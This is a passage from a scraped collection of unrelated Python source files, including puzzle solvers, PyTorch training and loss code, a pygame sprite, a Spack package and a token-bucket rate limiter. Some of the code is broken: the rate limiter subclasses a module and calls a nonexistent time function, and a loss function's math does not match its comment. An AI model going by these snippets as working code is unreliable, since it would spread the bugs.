format(goal[0:3],goal[3:6],goal[6:]))\n\n if puzzle != goal:\n root = Node(puzzle, puzzle.index(0), \"\", None)\n graph = Graph(root, int(size))\n node = None\n max = math.factorial(size**2)/2\n while node is None:\n graph.new_level()\n node = graph.bfs(goal)\n if len(graph.visited) > max:\n print(\"Puzzle has no solution\")\n return 0\n graph.print_path(node)\n print(\"# of nodes: {}\".format(len(graph.visited)))\n return len(graph.visited)\n return 0\n\n\ndef samples(goal, size):\n inputs = []\n for i in range(0, 100):\n new_puzzle = goal.copy()\n for j in range(0, random.randrange(1, 30)):\n move(new_puzzle, random.randrange(4), size, new_puzzle.index(0))\n inputs.append(new_puzzle)\n return inputs\n\n\ndef move(list, move_number, size, position):\n if position % size != 0 and move_number == 0:\n swap(list, position, position - 1)\n if position % size != size - 1 and move_number == 1:\n swap(list, position, position + 1)\n if position > size - 1 and move_number == 2:\n swap(list, position, position - size)\n if position < (len(list) - size) and move_number == 3 :\n swap(list, position, position + size)\n\n\nif __name__ == '__main__':\n goal = [1, 2, 3, 4, 5, 6, 7, 8, 0]\n inputs = samples(goal, 3)\n mean = 0\n for puzzle in inputs:\n mean += solve(3, puzzle,goal)\n mean = mean /100\n print(\"Mean: {}\".format(mean))","sub_path":"8-puzzle-solver/bfsNpuzzle.py","file_name":"bfsNpuzzle.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"315438691","text":"from torch import nn\nimport torch.nn.functional as F\nimport torch\nimport sys\nimport argparse\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nimport matplotlib.pyplot as plt\nfrom torchvision import datasets, transforms\nimport torchvision\nimport wandb\n\n\nwandb.init()\nkernel_size = 5\nchannel_sizes = [1, 6, 16]\nhidden_sizes = [256, 120, 84]\noutput_size = 10\ndropout_rate = 0.2\n\nclass MyAwesomeModel(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(channel_sizes[0], channel_sizes[1], kernel_size)\n self.conv2 = nn.Conv2d(channel_sizes[1], channel_sizes[2], kernel_size)\n # an affine operation: y = Wx + b\n self.fc1 = nn.Linear(hidden_sizes[0], hidden_sizes[1]) # 5*5 from image dimension\n self.fc2 = nn.Linear(hidden_sizes[1], hidden_sizes[2])\n self.fc3 = nn.Sequential(nn.Linear(hidden_sizes[2], output_size),nn.LogSoftmax(dim=1))\n self.dropout = nn.Dropout(p = dropout_rate)\n\n def forward(self, x):\n # Max pooling over a (2, 2) window\n x = self.dropout(F.max_pool2d(F.relu(self.conv1(x)), (2, 2)))\n #print('x shape', x.shape)\n # If the size is a square, you can specify with a single number\n x = self.dropout(F.max_pool2d(F.relu(self.conv2(x)), 2))\n #print('x shape2', x.shape)\n x = torch.flatten(x, 1) # flatten all dimensions except the batch dimension\n #print('x shape3', x.shape)\n x = self.dropout(F.relu(self.fc1(x)))\n x = self.dropout(F.relu(self.fc2(x)))\n x = self.fc3(x)\n return x\n\ntransform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5,), (0.5,))])\ntrain_set = datasets.MNIST('./.pytorch/MNIST_data/', download=True, train=True, transform=transform)\ntest_set = datasets.MNIST('./.pytorch/MNIST_data/', download=True, train=False, transform=transform)\n\nprint(\"Training day and night\")\nparser = argparse.ArgumentParser(description='Training arguments')\nparser.add_argument('--lr', default=0.003)\n# add any additional argument that you want\nargs = parser.parse_args(sys.argv[2:])\nprint(args)\n \nmodel = MyAwesomeModel()\nwandb.watch(model, log_freq=100)\n\ntrainloader = torch.utils.data.DataLoader(train_set, batch_size=64, shuffle=True)\ncriterion = nn.NLLLoss()\noptimizer = optim.Adam(model.parameters(), lr=0.003)\n\nepochs = 5\nsteps = 0\n\ntrain_losses, test_losses = [], []\nloss_epoch = []\nepoch_no = []\nfor e in range(epochs):\n print(\"Starting epoch \", e+1)\n running_loss = 0\n for images, labels in trainloader:\n model.train()\n optimizer.zero_grad()\n \n log_ps = model(images)\n loss = criterion(log_ps, labels)\n loss.backward()\n optimizer.step()\n wandb.log({\"loss\": loss})\n train_losses.append(loss.item())\n wandb.log({\"Input images\" : [wandb.Image(i) for i in images]})\n\n print('Loss: ', np.mean(train_losses))\n\n # for epoch vs loss plot \n epoch_no.append(e+1)\n loss_epoch.append(np.mean(train_losses))\n\ntorch.save(model.state_dict(), 'checkpoint.pth') # save model \nplt.plot(epoch_no, loss_epoch, label='Training loss')\nplt.xlabel('Epoch number')\nplt.legend()\nplt.show() ","sub_path":"03_debuggin_and_visualization/training_file_wandb.py","file_name":"training_file_wandb.py","file_ext":"py","file_size_in_byte":3184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"472001270","text":"import pygame\r\nimport constants\r\n\r\nfrom platforms import MovingPlatform\r\nfrom spritesheet_functions import SpriteSheet\r\n\r\n # --- Link Player Sprite\r\nclass Player(pygame.sprite.Sprite):\r\n # this class represents the bar at the bottom that the player controls\r\n\r\n # -- methods\r\n def __init__(self):\r\n #constructor function\r\n super(Player, self).__init__()\r\n\r\n # attributes\r\n # set vector speed\r\n self.change_x = 0\r\n self.change_y = 0\r\n\r\n # this holds all the animated images for walking left/right\r\n self.walking_frames_l = []\r\n self.walking_frames_r = []\r\n\r\n # What direction is the player facing?\r\n self.direction = \"R\"\r\n\r\n # list of sprites we can bump up against\r\n self.level = None\r\n\r\n sprite_sheet = SpriteSheet('link_sprite.png')\r\n # Load all the right facing images into a list\r\n #image = sprite_sheet.get_image(18,750,104,148)\r\n #self.walking_frames_r.append(image)\r\n image = sprite_sheet.get_image(23,99,41,69)\r\n self.walking_frames_r.append(image)\r\n image = sprite_sheet.get_image(113,102,38,66)\r\n self.walking_frames_r.append(image)\r\n image = sprite_sheet.get_image(205,106,40,59)\r\n self.walking_frames_r.append(image)\r\n image = sprite_sheet.get_image(299,102,35,65)\r\n self.walking_frames_r.append(image)\r\n image = sprite_sheet.get_image(390,106,32,61)\r\n self.walking_frames_r.append(image)\r\n\r\n\r\n # Load all the right facing images, then flip to face left\r\n\r\n #image = sprite_sheet.get_image(18,750,104,148)\r\n #image = pygame.transform.flip(image, True, False)\r\n #self.walking_frames_l.append(image)\r\n image = sprite_sheet.get_image(23,99,41,69)\r\n image = pygame.transform.flip(image, True, False)\r\n self.walking_frames_l.append(image)\r\n image = sprite_sheet.get_image(113,102,38,66)\r\n image = pygame.transform.flip(image, True, False)\r\n self.walking_frames_l.append(image)\r\n image = sprite_sheet.get_image(205,106,40,59)\r\n image = pygame.transform.flip(image, True, False)\r\n self.walking_frames_l.append(image)\r\n image = sprite_sheet.get_image(299,102,35,65)\r\n image = pygame.transform.flip(image, True, False)\r\n self.walking_frames_l.append(image)\r\n image = sprite_sheet.get_image(390,106,32,61)\r\n image = pygame.transform.flip(image, True, False)\r\n\r\n\r\n # Set the image player starts with\r\n self.image = self.walking_frames_r[0]\r\n\r\n # set a reference to the image rect\r\n self.rect = self.image.get_rect()\r\n\r\n def update(self):\r\n # move the player\r\n # Gravity\r\n self.calc_grav()\r\n\r\n # move left/right\r\n self.rect.x += self.change_x\r\n pos = self.rect.x + self.level.world_shift\r\n if self.direction == \"R\":\r\n frame = (pos // 30) % len(self.walking_frames_r)\r\n self.image = self.walking_frames_r[frame]\r\n else:\r\n frame = (pos // 30) % len(self.walking_frames_l)\r\n self.image = self.walking_frames_l[frame]\r\n\r\n # see if hit anything\r\n block_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\r\n for block in block_hit_list:\r\n if self.change_x > 0:\r\n self.rect.right = block.rect.left\r\n elif self.change_x < 0:\r\n self.rect.left = block.rect.right\r\n\r\n # move up/down\r\n self.rect.y += self.change_y\r\n\r\n # check if hit anything\r\n block_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\r\n for block in block_hit_list:\r\n if self.change_y > 0:\r\n self.rect.bottom = block.rect.top\r\n elif self.change_y < 0:\r\n self.rect.top = block.rect.bottom\r\n\r\n # 
stop vertival movement\r\n self.change_y = 0\r\n\r\n if isinstance(block, MovingPlatform):\r\n self.rect.x += block.change_x\r\n\r\n def calc_grav(self):\r\n # calc effects of gravity\r\n if self.change_y == 0:\r\n self.change_y = 1\r\n else:\r\n self.change_y += .35\r\n\r\n # see if we are on the ground\r\n if self.rect.y >= constants.SCREEN_HEIGHT - self.rect.height and self.change_y >= 0:\r\n self.change_y = 0\r\n self.rect.y = constants.SCREEN_HEIGHT - self.rect.height\r\n\r\n def jump(self):\r\n\r\n self.rect.y += 2\r\n platform_hit_list = pygame.sprite.spritecollide(self, self.level.platform_list, False)\r\n self.rect.y -= 2\r\n\r\n # if it's ok to jump, set speed upwards\r\n if len(platform_hit_list) > 0 or self.rect.bottom >= constants.SCREEN_HEIGHT:\r\n self.change_y = -10\r\n\r\n # Player Controlled Movement\r\n def go_left(self):\r\n # called when user hits the Left Arrow\r\n self.change_x = -6\r\n self.direction = \"L\"\r\n\r\n def go_right(self):\r\n self.change_x =6\r\n self.direction = \"R\"\r\n\r\n def stop(self):\r\n # called when nothing is being pressed\r\n self.change_x = 0\r\n","sub_path":"some_platformer/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":5188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"628832141","text":"# Copyright (c) 2016-2023 Association of Universities for Research in Astronomy, Inc. (AURA)\n# For license information see LICENSE or https://opensource.org/licenses/BSD-3-Clause\n\nimport re\nimport os\nfrom typing import Dict, Set, FrozenSet\nfrom datetime import date, datetime, timedelta\nfrom dataclasses import dataclass\n\nfrom astropy.time import Time\nfrom lucupy.sky import night_events\nfrom lucupy.minimodel import ALL_SITES, Site\n\nfrom definitions import ROOT_DIR\nfrom scheduler.services.abstract import ExternalService\n\n\n@dataclass(frozen=True)\nclass Interruption:\n \"\"\"\n Parent class for any interruption in the night that would\n cause missing time of observation.\n \"\"\"\n start: datetime\n time_loss: timedelta\n reason: str\n\n\n@dataclass(frozen=True)\nclass Fault(Interruption):\n id: str\n\n\n@dataclass(frozen=True)\nclass EngTask(Interruption):\n end: datetime\n\n\nclass ChronicleService(ExternalService):\n\n def __init__(self, sites: FrozenSet[Site] = ALL_SITES):\n self._sites = sites\n self._path = os.path.join(ROOT_DIR, 'scheduler', 'services', 'chronicle', 'data')\n # Fault reports by datetime to calculate missing instruments\n self._faults: Dict[Site, Dict[date, Set[Fault]]] = {site: {} for site in self._sites}\n\n # Engineering Task by datetime.\n self._eng_task: Dict[Site, Dict[date, Set[EngTask]]] = {site: {} for site in self._sites}\n\n\nclass FileBasedChronicle(ChronicleService):\n\n def _parse_eng_task_file(self, site: Site, to_file: str) -> None:\n \"\"\"\n Parse Engineering task that block moments or the entire night.\n Each twilight is calculated using lucupy.sky, some discrepancies might affect.\n \"\"\"\n pattern = r'(\\[.*\\])'\n # Ignore GS until the file is created.\n if site is Site.GS:\n return\n\n with open(os.path.join(self._path, to_file), 'r') as file:\n for line_num, line in enumerate(file):\n # Find pattern to keep bracket comments not split.\n match = re.search(pattern, line)\n if match:\n comment = match.group(1)\n rest_of_line = re.sub(pattern, '', line)\n eng_date, start_time, end_time = rest_of_line.strip().split()\n # Single date for key\n just_date = datetime.strptime(eng_date, '%Y-%m-%d')\n # Time day in jd to calculate twilight\n time = Time(just_date)\n _, _, _, even_12twi, morn_12twi, _, _ = night_events(time,\n site.location,\n site.timezone)\n\n # Handle twilight\n if start_time == 'twi':\n start_date = even_12twi.datetime\n end_date = (morn_12twi.datetime if end_time == 'twi' else\n datetime.strptime(f'{eng_date} {end_time}', '%Y-%m-%d %H:%M'))\n else:\n start_date = datetime.strptime(f'{eng_date} {start_time}', '%Y-%m-%d %H:%M')\n end_date = (morn_12twi.datetime if end_time == 'twi'\n else datetime.strptime(f'{eng_date} {end_time}', '%Y-%m-%d %H:%M'))\n\n time_loss = end_date - start_date\n eng_task = EngTask(start=start_date,\n end=end_date,\n time_loss=time_loss,\n reason=comment)\n\n if just_date in self._eng_task[site]:\n self._eng_task[site][just_date].add(eng_task)\n else:\n self._eng_task[site][just_date] = {eng_task}\n else:\n raise ValueError(f'Pattern not found. 
Format error on Eng Task file at line {line_num}')\n\n def _parse_faults_file(self, site: Site, to_file: str) -> None:\n \"\"\"Parse faults from files.\n This is purposeful left non-private as might be used with incoming files from\n the React app.\n \"\"\"\n # Files contains this repetitive string in each timestamp, if we need them\n # we could add them as constants.\n ts_clean = ' 04:00' if site is Site.GS else ' 10:00'\n with open(os.path.join(self._path, to_file), 'r') as file:\n for line_num, original_line in enumerate(file):\n line = original_line.rstrip() # remove trail spaces\n if line: # ignore empty lines\n if line[0].isdigit():\n # TODO: Unused variable and just a string, not a semester.\n semester = line\n elif line.startswith('FR'): # found a fault\n items = line.split('\\t')\n # Create timestamp with ts_clean var removed\n ts = datetime.strptime(items[1].replace(ts_clean, ''),\n '%Y %m %d %H:%M:%S')\n fault = Fault(id=items[0],\n start=ts, # date with time\n time_loss=timedelta(hours=float(items[2])), # time loss\n reason=items[3]) # comment for the fault\n if ts.date() in self._faults[site]:\n self._faults[site][ts.date()].add(fault)\n else:\n self._faults[site][ts.date()] = {fault}\n else:\n raise ValueError(f'Fault file has wrong format at line {line_num}')\n","sub_path":"scheduler/services/chronicle/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"409054566","text":"\"\"\"\r\nInspired from Monoloco\r\nCauchy,GEV losses have been added\r\n\"\"\"\r\nfrom __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\n\r\nimport math\r\nimport torch\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass CustomL1Loss(torch.nn.Module):\r\n \"\"\"\r\n L1 loss with more weight to errors at a shorter distance\r\n It inherits from nn.module so it supports backward\r\n \"\"\"\r\n\r\n def __init__(self, dic_norm, device, beta=1):\r\n super(CustomL1Loss, self).__init__()\r\n\r\n self.dic_norm = dic_norm\r\n self.device = device\r\n self.beta = beta\r\n\r\n @staticmethod\r\n def compute_weights(xx, beta=1):\r\n \"\"\"\r\n Return the appropriate weight depending on the distance and the hyperparameter chosen\r\n alpha = 1 refers to the curve of A Photogrammetric Approach for Real-time...\r\n It is made for unnormalized outputs (to be more understandable)\r\n From 70 meters on every value is weighted the same (0.1**beta)\r\n Alpha is optional value from Focal loss. Yet to be analyzed\r\n \"\"\"\r\n # alpha = np.maximum(1, 10 ** (beta - 1))\r\n alpha = 1\r\n ww = np.maximum(0.1, 1 - xx / 78)**beta\r\n\r\n return alpha * ww\r\n\r\n def print_loss(self):\r\n xx = np.linspace(0, 80, 100)\r\n y1 = self.compute_weights(xx, beta=1)\r\n y2 = self.compute_weights(xx, beta=2)\r\n y3 = self.compute_weights(xx, beta=3)\r\n plt.plot(xx, y1)\r\n plt.plot(xx, y2)\r\n plt.plot(xx, y3)\r\n plt.xlabel(\"Distance [m]\")\r\n plt.ylabel(\"Loss function Weight\")\r\n plt.legend((\"Beta = 1\", \"Beta = 2\", \"Beta = 3\"))\r\n plt.show()\r\n\r\n def forward(self, output, target):\r\n\r\n unnormalized_output = output.cpu().detach().numpy() * self.dic_norm['std']['Y'] + self.dic_norm['mean']['Y']\r\n weights_np = self.compute_weights(unnormalized_output, self.beta)\r\n weights = torch.from_numpy(weights_np).float().to(self.device) # To make weights in the same cuda device\r\n losses = torch.abs(output - target) * weights\r\n loss = losses.mean() # Mean over the batch\r\n return loss\r\n\r\n\r\nclass LaplacianLoss(torch.nn.Module):\r\n \"\"\"1D Gaussian with std depending on the absolute distance\r\n \"\"\"\r\n def __init__(self, size_average=True, reduce=True, evaluate=False):\r\n super(LaplacianLoss, self).__init__()\r\n self.size_average = size_average\r\n self.reduce = reduce\r\n self.evaluate = evaluate\r\n\r\n def laplacian_1d(self, mu_si, xx):\r\n \"\"\"\r\n 1D Gaussian Loss. f(x | mu, sigma). The network outputs mu and sigma. 
X is the ground truth distance.\r\n This supports backward().\r\n Inspired by\r\n https://github.com/naba89/RNN-Handwriting-Generation-Pytorch/blob/master/loss_functions.py\r\n\r\n \"\"\"\r\n mu, si = mu_si[:, 0:1], mu_si[:, 1:2]\r\n # norm = xx - mu\r\n norm = 1 - mu / xx # Relative\r\n\r\n term_a = torch.abs(norm) * torch.exp(-si)\r\n \r\n \r\n \r\n term_b = si\r\n \r\n norm_bi = (np.mean(np.abs(norm.cpu().detach().numpy())), np.mean(torch.exp(si).cpu().detach().numpy()))\r\n \r\n if self.evaluate:\r\n return norm_bi\r\n return term_a + term_b\r\n\r\n def forward(self, outputs, targets):\r\n\r\n values = self.laplacian_1d(outputs, targets)\r\n\r\n if not self.reduce or self.evaluate:\r\n return values\r\n if self.size_average:\r\n mean_values = torch.mean(values)\r\n return mean_values\r\n return torch.sum(values)\r\n\r\n\r\nclass GaussianLoss(torch.nn.Module):\r\n \"\"\"1D Gaussian with std depending on the absolute distance\r\n \"\"\"\r\n def __init__(self, device, size_average=True, reduce=True, evaluate=False):\r\n super(GaussianLoss, self).__init__()\r\n self.size_average = size_average\r\n self.reduce = reduce\r\n self.evaluate = evaluate\r\n self.device = device\r\n\r\n def gaussian_1d(self, mu_si, xx):\r\n \"\"\"\r\n 1D Gaussian Loss. f(x | mu, sigma). The network outputs mu and sigma. X is the ground truth distance.\r\n This supports backward().\r\n Inspired by\r\n https://github.com/naba89/RNN-Handwriting-Generation-Pytorch/blob/master/loss_functions.py\r\n \"\"\"\r\n mu, si = mu_si[:, 0:1], mu_si[:, 1:2]\r\n\r\n min_si = torch.ones(si.size()).cuda(self.device) * 0.1\r\n si = torch.max(min_si, si)\r\n norm = xx - mu\r\n term_a = (norm / si)**2 / 2\r\n term_b = torch.log(si * math.sqrt(2 * math.pi))\r\n\r\n norm_si = (np.mean(np.abs(norm.cpu().detach().numpy())), np.mean(si.cpu().detach().numpy()))\r\n\r\n if self.evaluate:\r\n return norm_si\r\n\r\n return term_a + term_b\r\n\r\n def forward(self, outputs, targets):\r\n\r\n values = self.gaussian_1d(outputs, targets)\r\n\r\n if not self.reduce or self.evaluate:\r\n return values\r\n if self.size_average:\r\n mean_values = torch.mean(values)\r\n return mean_values\r\n return torch.sum(values)\r\n\r\nclass CauchyLoss(torch.nn.Module):\r\n \"\"\"\r\n author:M.V.S Sanjay\r\n mail:mvssanjay.007@gmail.com\r\n \"\"\"\r\n def __init__(self, device, size_average=True, reduce=True, evaluate=False):\r\n super(CauchyLoss, self).__init__()\r\n self.size_average = size_average\r\n self.reduce = reduce\r\n self.evaluate = evaluate\r\n self.device = device\r\n \r\n def cauchy_1d(self,mu_si,xx):\r\n\r\n mu, si= mu_si[:, 0:1], mu_si[:, 1:2]\r\n\r\n norm=torch.abs(mu-xx)# relative to xx\r\n \r\n #t_a= log(pi*b)\r\n term_a=torch.abs(si)*math.pi \r\n \r\n term_b=torch.log((((norm)/torch.exp(torch.abs(si)))**2)+1)\r\n \r\n\r\n norm_si = (np.mean(np.abs(norm.cpu().detach().numpy())), np.mean(si.cpu().detach().numpy()))\r\n if self.evaluate:\r\n return norm_si\r\n\r\n return term_a + term_b\r\n\r\n def forward(self, outputs, targets):\r\n\r\n values = self.cauchy_1d(outputs, targets)\r\n\r\n if not self.reduce or self.evaluate:\r\n return values\r\n if self.size_average:\r\n mean_values = torch.mean(values)\r\n return mean_values\r\n return torch.sum(values)\r\n \r\n\r\n \r\nclass GevLoss(torch.nn.Module):\r\n \"\"\"\r\n author: N. 
Pavan Srinivas\r\n mail:pavansrinivas1999@gmail.com\r\n \"\"\"\r\n def __init__(self, device, size_average=True, reduce=True, evaluate=False):\r\n super(GevLoss, self).__init__()\r\n self.size_average = size_average\r\n self.reduce = reduce\r\n self.evaluate = evaluate\r\n self.device = device\r\n \r\n def gev_1d(self,mu_si,xx):\r\n\r\n mu, si= mu_si[:, 0:1], mu_si[:, 1:2]\r\n\r\n norm=(torch.abs(mu-xx))\r\n term_c=norm*(torch.exp(-1*torch.abs(si)))\r\n term_a=torch.abs(si)\r\n \r\n #print(term_a)\r\n term_b=torch.exp(-1*(norm/torch.abs(si)))\r\n #print(\"**\"*100)\r\n #print(term_b)\r\n \r\n\r\n norm_si = (np.mean(np.abs(norm.cpu().detach().numpy())), np.mean(si.cpu().detach().numpy()))\r\n \r\n if self.evaluate:\r\n return norm_si\r\n\r\n return term_a + term_b + norm\r\n\r\n def forward(self, outputs, targets):\r\n\r\n values = self.gev_1d(outputs, targets)\r\n\r\n if not self.reduce or self.evaluate:\r\n return values\r\n if self.size_average:\r\n mean_values = torch.mean(values)\r\n return mean_values\r\n return torch.sum(values)\r\n\r\n","sub_path":"losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":7560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
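For losses.py above, the slicing in laplacian_1d implies the network emits a (mu, log-sigma) pair per sample while the targets hold ground-truth distances. A minimal CPU sanity check with dummy tensors (the values are illustrative, not from the original repo):

```python
import torch

loss_fn = LaplacianLoss()
outputs = torch.tensor([[10.0, 0.0],      # [mu, log(sigma)] for sample 1
                        [20.0, 0.5]])     # [mu, log(sigma)] for sample 2
targets = torch.tensor([[12.0], [18.0]])  # ground-truth distances
print(loss_fn(outputs, targets).item())   # mean of |1 - mu/x| * exp(-si) + si
```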
+{"seq_id":"627315432","text":"#!/usr/bin/python3\n'''A module for working with singly linked lists.\n'''\n\n\nclass Node:\n '''Represents a node in a singly linked list.\n '''\n def __init__(self, data, next_node=None):\n '''Initializes a Node with a given data and next link.\n\n Args:\n data (int): The data of the Node.\n next_node (Node): The Node next to this Node.\n '''\n self.data = data\n self.next_node = next_node\n\n @property\n def data(self):\n '''Retrieves the data of this Node.\n\n Returns:\n int: The data of this Node.\n '''\n return self.__data\n\n @property\n def next_node(self):\n '''Retrieves the Node next to this Node.\n\n Returns:\n Node: The Node next to this Node.\n '''\n return self.__next_node\n\n @data.setter\n def data(self, value):\n '''Updates the data of this Node.\n\n Args:\n value (int): The new data of this Node.\n '''\n if not isinstance(value, int):\n raise TypeError('data must be an integer')\n else:\n self.__data = value\n\n @next_node.setter\n def next_node(self, value):\n '''Updates the next node of this Node.\n\n Args:\n value (Node): The new node next to this Node.\n '''\n if value is None or isinstance(value, Node):\n self.__next_node = value\n else:\n raise TypeError('next_node must be a Node object')\n\n\nclass SinglyLinkedList:\n '''Represents a singly linked list.\n '''\n def __init__(self):\n '''Initializes a singly linked list.'''\n self.__head = None\n\n def sorted_insert(self, value):\n '''Inserts a new Node into the correct sorted position\n in the list (increasing order).\n\n Args:\n value (int): The data of the Node to be inserted into the list.\n '''\n if not isinstance(value, int) or value is None:\n raise TypeError('value must be an integer')\n else:\n if self.__head is None or self.__head.data >= value:\n new_node = Node(value, self.__head)\n self.__head = new_node\n else:\n node_ptr = self.__head\n prev_ptr = None\n while node_ptr is not None and value > node_ptr.data:\n prev_ptr = node_ptr\n node_ptr = node_ptr.next_node\n new_node = Node(value, node_ptr)\n prev_ptr.next_node = new_node\n\n def __str__(self):\n '''Returns a string representation of this singly linked list.\n\n Returns:\n str: A string representation of this singly linked list.\n '''\n node_ptr = self.__head\n res = []\n while node_ptr is not None:\n res.append(str(node_ptr.data))\n node_ptr = node_ptr.next_node\n return '' if len(res) == 0 else '\\n'.join(res)\n","sub_path":"0x06-python-classes/100-singly_linked_list.py","file_name":"100-singly_linked_list.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"507947788","text":"# Copyright 2013-2022 Lawrence Livermore National Security, LLC and other\n# Spack Project Developers. See the top-level COPYRIGHT file for details.\n#\n# SPDX-License-Identifier: (Apache-2.0 OR MIT)\n\nfrom spack.package import *\n\n\nclass Kripke(CMakePackage):\n \"\"\"Kripke is a simple, scalable, 3D Sn deterministic particle\n transport proxy/mini app.\n \"\"\"\n\n homepage = \"https://computing.llnl.gov/projects/co-design/kripke\"\n git = \"https://github.com/LLNL/Kripke.git\"\n\n tags = [\"proxy-app\"]\n version(\"1.2.4\", submodules=True, tag=\"v1.2.4\")\n version(\"1.2.3\", submodules=True, tag=\"v1.2.3\")\n version(\"1.2.2\", submodules=True, tag=\"v1.2.2-CORAL2\")\n version(\"1.2.1\", submodules=True, tag=\"v1.2.1-CORAL2\")\n version(\"1.2.0\", submodules=True, tag=\"v1.2.0-CORAL2\")\n\n variant(\"mpi\", default=True, description=\"Build with MPI.\")\n variant(\"openmp\", default=True, description=\"Build with OpenMP enabled.\")\n variant(\"caliper\", default=False, description=\"Build with Caliper support enabled.\")\n\n depends_on(\"mpi\", when=\"+mpi\")\n depends_on(\"cmake@3.0:\", type=\"build\")\n depends_on(\"caliper\", when=\"+caliper\")\n\n def cmake_args(self):\n def enabled(variant):\n return 1 if variant in self.spec else 0\n\n return [\n \"-DENABLE_OPENMP=%d\" % enabled(\"+openmp\"),\n \"-DENABLE_MPI=%d\" % enabled(\"+mpi\"),\n \"-DENABLE_CALIPER=%d\" % enabled(\"+caliper\"),\n ]\n\n def install(self, spec, prefix):\n # Kripke does not provide install target, so we have to copy\n # things into place.\n mkdirp(prefix.bin)\n install(join_path(self.build_directory, \"bin/kripke.exe\"), prefix.bin)\n","sub_path":"var/spack/repos/builtin/packages/kripke/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"102441898","text":"import matplotlib.pyplot as plt\r\nimport os\r\nos.environ['FOR_DISABLE_CONSOLE_CTRL_HANDLER'] = '1'\r\ndef make_plot(viz, array, win, epoch, i, use_visdom):\r\n plt.clf()\r\n plt.plot(array)\r\n plt.title(win)\r\n plt.ylabel(win)\r\n plt.xlabel(f'{epoch}:{i}')\r\n if use_visdom:\r\n loss_win = viz.matplot(plt, win=win)\r\n\r\ndef svd_loss(inputs, label, outputs, net, reg_param = 0.01, print_losses=False, avg_const = 0):\r\n\tloss = 0.0\r\n\treg_loss = 0.0\r\n\tloss += ((label-outputs - avg_const)**2).sum()\r\n\tfor i in range(inputs.shape[0]):\r\n\t\treg_loss += reg_param * ((net.u_matrix(inputs[i][0])**2).sum() + (net.v_matrix(inputs[i][1])**2).sum())\r\n\tprint(f'loss : {loss}, reg_loss : {reg_loss}')\r\n\treturn loss+reg_loss\r\n","sub_path":"svd_util.py","file_name":"svd_util.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"493771578","text":"# ============================================================================\n# FILE: rec.py\n# AUTHOR: Shougo Matsushita \n# License: MIT license\n# ============================================================================\n\nfrom .base import Base\nimport subprocess\n\n\nclass Source(Base):\n\n def __init__(self, vim):\n Base.__init__(self, vim)\n\n self.name = 'rec'\n\n def gather_candidates(self, context):\n args = ['find', '-L', '.', '-path', '*/.git/*', '-prune', '-o',\n '-type', 'l', '-print', '-o', '-type', 'f', '-print']\n return [{'word': x, 'action__path': x}\n for x in subprocess.check_output(args).decode(\n 'utf-8').split('\\n')]\n","sub_path":"rplugin/python3/denite/source/rec.py","file_name":"rec.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"481742136","text":"import time\nimport RateLimiterInterface\nclass TokenBucket(RateLimiterInterface):\n def __init__(self, bucketCapactiy, refreshRate) -> None:\n super().__init__()\n self.bucketCapacity = bucketCapactiy\n self.refreshRate = refreshRate\n self.currentCapactiy = bucketCapactiy\n self.lastUpdatedTime = time.nowInMillis()\n\n def grantAccess(self):\n self.refreshBucket()\n if self.currentCapactiy > 0:\n self.currentCapactiy -= 1\n return True\n return False\n \n def refreshBucket(self):\n currentTime = time.nowInMillis()\n additionalToken = (currentTime - self.lastUpdatedTime) / 1000 * self.refreshRate\n currCapacity = min(self.currentCapactiy + additionalToken, self.bucketCapacity)\n self.currentCapactiy = currCapacity\n self.lastUpdatedTime = currentTime\n\n\nclass UserBucketCreator:\n def __init__(self, id) -> None:\n self.bucket = dict() # Map of int, TokenBucket\n self.bucket[id] = TokenBucket(10, 10)\n\n def accessApplication(self, id):\n if id in self.bucket and self.bucket[id].grantAccess():\n print (\"able to access application\")\n else:\n print(\"Too many request, please try after sometime\")","sub_path":"systemdesign/TokenBucketRateLimiter.py","file_name":"TokenBucketRateLimiter.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"135391089","text":"\"obscene weather\"\r\n\r\nfrom util import hook, http\r\n\r\n@hook.command(autohelp=False)\r\ndef fweather(inp, chan='', nick='', reply=None, db=None):\r\n \".fweather | @ -- gets the effin weather\"\r\n\r\n\r\n # this database is used by other plugins interested in user's locations,\r\n # like .near in tag.py\r\n db.execute(\r\n \"create table if not exists location(chan, nick, loc, lat, lon, primary key(chan, nick))\")\r\n\r\n if inp[0:1] == '@':\r\n nick = inp[1:].strip()\r\n loc = None\r\n dontsave = True\r\n else:\r\n loc = inp\r\n\r\n dontsave = loc.endswith(\" dontsave\")\r\n if dontsave:\r\n loc = loc[:-9].strip().lower()\r\n\r\n if not loc: # blank line\r\n loc = db.execute(\r\n \"select loc from location where chan=? and nick=lower(?)\",\r\n (chan, nick)).fetchone()\r\n if not loc:\r\n try:\r\n # grab from old-style weather database\r\n loc = db.execute(\"select loc from weather where nick=lower(?)\",\r\n (nick,)).fetchone()\r\n except db.OperationalError:\r\n pass # no such 